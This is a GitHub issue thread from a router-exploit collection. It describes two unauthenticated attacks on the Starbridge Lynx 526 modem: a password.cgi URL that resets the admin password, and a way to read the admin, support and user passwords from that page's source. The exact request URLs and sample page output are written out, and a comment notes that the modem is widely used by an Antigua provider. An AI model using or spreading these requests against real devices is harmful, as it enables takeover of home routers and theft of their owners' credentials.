### ISSUE TITLE
Starbridge Lynx 526 (Very commonly used modem on Aruba)

### ISSUE THREAD

**Issue by hkm** [hkm/routerpwn.com#54]
#9/9/2014 5:38:18    "Starbridge Lynx 526 (Very commonly used modem on Aruba)

Reset Admin password:
http://192.168.1.1/password.cgi?sysPassword=whatever
## Resets Admin Password to whatever

Reveal All Passwords:
Goto 
http://192.168.1.1/password.cgi
In browser page, rightclick and Show Page Source, 
It will show something like this:

<html>
   <head>
      <meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
      <link rel=""stylesheet"" href='stylemain.css' type='text/css'>
         <link rel=""stylesheet"" href='colors.css' type='text/css'>
            <script language=""javascript"" src=""util.js""></script>
            <script language=""javascript"">
<!-- hide

pwdAdmin = 'AdminPassword';
pwdSupport = 'SupportPassword';
pwdUser = 'UserPassword';
"   Toebab  toebab@gmail.com

**Comment by mraffonso** [comment]
APUA in Antigua used this modem a lot as well.
